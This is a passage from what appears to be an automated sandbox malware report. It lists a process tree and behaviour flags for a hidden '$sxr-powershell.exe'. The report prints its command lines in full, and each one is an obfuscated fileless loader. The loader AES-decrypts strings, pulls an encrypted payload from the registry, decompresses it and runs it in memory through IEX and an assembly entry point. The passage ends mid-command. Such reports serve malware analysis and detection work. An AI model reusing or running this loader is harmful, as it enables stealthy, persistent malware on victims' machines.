$OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:7888
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:7392
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:8104
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:6888
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] 